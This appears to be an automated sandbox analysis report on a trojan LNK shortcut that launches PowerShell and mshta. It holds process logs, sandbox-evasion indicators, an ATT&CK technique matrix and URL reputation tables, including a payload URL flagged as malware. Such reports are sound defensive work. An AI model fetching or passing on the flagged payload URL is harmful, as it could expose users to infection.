Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\mshta.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2286			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 904			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1460	Thread sleep count: 2286 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1460	Thread sleep count: 904 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5084	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5916	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2699708620.000001BD65E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2701605901.000001BD6B454000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWdClass
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	11 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	11 Process Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Source	Detection	Scanner	Label	Link
8t6beMY1wO.lnk	34%	Virustotal		Browse
8t6beMY1wO.lnk	46%	ReversingLabs	Shortcut.Trojan.Pantera

Source	Detection	Scanner	Link
vidstreemz.b-cdn.net	12%	Virustotal	Browse
bunnycdn.com	0%	Virustotal	Browse
bunnyfonts.b-cdn.net	0%	Virustotal	Browse
bunny.net	0%	Virustotal	Browse
bunnycdn.b-cdn.net	1%	Virustotal	Browse
fonts.bunny.net	0%	Virustotal	Browse

Source	Detection	Scanner	Label	Link
https://bunnycdn.com/~	0%	Avira URL Cloud	safe
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg...4B	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-cyr	0%	Avira URL Cloud	safe
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg)M	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff)	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-hebrew-700-normal.woff)	0%	Avira URL Cloud	safe
https://bunny.net/v2/images/bunnynet-logo.svg	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normal.woff)	0%	Avira URL Cloud	safe
https://bunnycdn.b-cdn.net/	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-hebrew-700-normal.woff)	0%	Virustotal		Browse
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-900-normal.woff)	0%	Avira URL Cloud	safe
https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.cssC	0%	Avira URL Cloud	safe
https://bunnycdn.b-cdn.net/	0%	Virustotal		Browse
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svgUXo	0%	Avira URL Cloud	safe
https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css?	0%	Avira URL Cloud	safe
https://bunny.net/v2/images/bunnynet-logo.svg	0%	Virustotal		Browse
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg);	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-hebrew-500-normal.woff2)	0%	Avira URL Cloud	safe
https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css?	0%	Virustotal		Browse
https://fonts.bunny.net/rubik/files/rubik-arabic-900-normal.woff)	0%	Avira URL Cloud	safe
https://vidstreemz.b-cdn.net/nexto...	100%	Avira URL Cloud	malware
https://fonts.bunny.net/rubik/files/rubik-latin-ext-300-normal.woff)	0%	Avira URL Cloud	safe
https://bunny.net/v2/images/bunnynet-logo.svgb(	0%	Avira URL Cloud	safe
https://vidstreemz.b-cdn.net/nexto...	0%	Virustotal		Browse
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg);	0%	Virustotal		Browse
https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff)	0%	Virustotal		Browse
https://fonts.bunny.net/rubik/files/rubik-hebrew-400-normal.woff)	0%	Avira URL Cloud	safe
https://bunny.net(	0%	Avira URL Cloud	safe
http://fonts.bunny.net/css?family=Rubik:300,400,500,700,900	0%	Avira URL Cloud	safe
https://fonts.bunny.net/p	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff2)	0%	Avira URL Cloud	safe
https://bunny.net/	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-aW	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-hebrew-300-normal.woff)	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-700-normal.woff2)	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-400-normal.woff)	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff2)	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-arabic-	0%	Avira URL Cloud	safe
https://bunny.net/v2/images/bunnynet-logo.svgx	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-400-normal.woff)	0%	Virustotal		Browse
https://fonts.bunny.net/rubik/files/rubik-cyrillic-300-normal.woff)	0%	Avira URL Cloud	safe
https://bunny.net/	0%	Virustotal		Browse
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-700-normal.woff2)	0%	Virustotal		Browse
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff2)	0%	Virustotal		Browse
https://fonts.bunny.net/css?family=Rubik:300,400,500,700,900	0%	Avira URL Cloud	safe
https://bunny.net/v2/images/bunnynet-logo.svg...	0%	Avira URL Cloud	safe
https://bunny.net/v2/images/bunnynet-logo.svgcss/unconfigured.css	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-300-normal.woff)	0%	Virustotal		Browse
http://crl.ver)	0%	Avira URL Cloud	safe
https://g.live.com/odclientsettings/ProdV2/C:	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-latin-900-normal.woff)	0%	Avira URL Cloud	safe
http://fonts.bunny.net/css?family=Rubik:300,400,500,700,900	0%	Virustotal		Browse
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg7X	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-latinD	0%	Avira URL Cloud	safe
http://fonts.bunny.net/	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-arabic-500-normal.woff)	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-cyrilli	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-900-normal.woff2)	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-500-normal.woff2)	0%	Avira URL Cloud	safe
https://vidstreemz.b-cdn.net/nexto$global:?	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-latin-300-normal.woff2)	0%	Avira URL Cloud	safe
https://vidstreemz.b-cdn.net/nextoC:	0%	Avira URL Cloud	safe
https://vidstreemz.b-cdn.net/nexto(	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-latin-ext-300-normal.woff2)	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normw	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-300-normal.woff2)	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-arabic-700-normal.woff2)	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-latin-ext-900-normal.woff2)	0%	Avira URL Cloud	safe
https://bunny.net/%z	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-latin-700-normal.woff)	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-arabic-700-normal.woff)	0%	Avira URL Cloud	safe
https://vidstreemz.b-cdn.net/	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-arabic-400-normal.woff2)	0%	Avira URL Cloud	safe
https://vidstreemz.b-cdn.net/nexto;	100%	Avira URL Cloud	malware
https://bunny.net/v	0%	Avira URL Cloud	safe
https://vidstreemz.b-cdn.net/nextoubik:300	0%	Avira URL Cloud	safe
https://bunny.net/x	0%	Avira URL Cloud	safe
https://bunny.net/t	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-latin-900-normal.woff2)	0%	Avira URL Cloud	safe
https://bunny.net/l	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-900-normal.woff)	0%	Avira URL Cloud	safe
https://vidstreemz.b-cdn.net/nexto	100%	Avira URL Cloud	malware
https://fonts.bunny.net/rubik/files/rubik-arabic-400-normal.woff)	0%	Avira URL Cloud	safe
https://fonts.bunny.net/	0%	Avira URL Cloud	safe
https://vidstreemz.b-cdn.net/nextoH	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-latin-ext-700-normal.woff2)	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff)	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-latin-ext-400-normal.woff2)	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normalformat(	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-500-normal.woff2)	0%	Avira URL Cloud	safe
https://vidstreemz.b-cdn.net/nextoY	0%	Avira URL Cloud	safe
https://bunny.net/S	0%	Avira URL Cloud	safe
https://fonts.bunny.	0%	Avira URL Cloud	safe
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg...	0%	Avira URL Cloud	safe
https://bunny.net/O	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-hebrew-300-normal.woff2)	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-hebrew-500-normal.woff)	0%	Avira URL Cloud	safe
https://bunny.net/P	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-500-normal.woff)	0%	Avira URL Cloud	safe
https://fonts.bunny.net/rubik/files/rubik-arabic-500-normal.woff2)	0%	Avira URL Cloud	safe

Name	IP	Active	Malicious	Antivirus Detection	Reputation
vidstreemz.b-cdn.net	138.199.36.7	true	true	12%, Virustotal, Browse	unknown
bunnycdn.com	169.150.247.36	true	false	0%, Virustotal, Browse	unknown
bunnyfonts.b-cdn.net	169.150.236.104	true	false	0%, Virustotal, Browse	unknown
bunny.net	169.150.247.39	true	false	0%, Virustotal, Browse	unknown
bunnycdn.b-cdn.net	169.150.247.37	true	false	1%, Virustotal, Browse	unknown
fonts.bunny.net	unknown	unknown	false	0%, Virustotal, Browse	unknown

Name	Malicious	Antivirus Detection	Reputation
https://bunny.net/v2/images/bunnynet-logo.svg	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://fonts.bunny.net/css?family=Rubik:300,400,500,700,900	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://fonts.bunny.net/css?family=Rubik:300,400,500,700,900	false	Avira URL Cloud: safe	unknown
https://vidstreemz.b-cdn.net/nexto	true	Avira URL Cloud: malware	unknown

Name	Source	Malicious	Antivirus Detection	Reputation
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg...4B	mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff)	mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-cyr	mshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bunnycdn.com/~	mshta.exe, 00000004.00000002.2700827513.00000279E7826000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg)M	mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-hebrew-700-normal.woff)	css[1].css.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normal.woff)	mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://bunnycdn.b-cdn.net/	mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-900-normal.woff)	mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.cssC	mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svgUXo	mshta.exe, 00000004.00000002.2700827513.00000279E7898000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
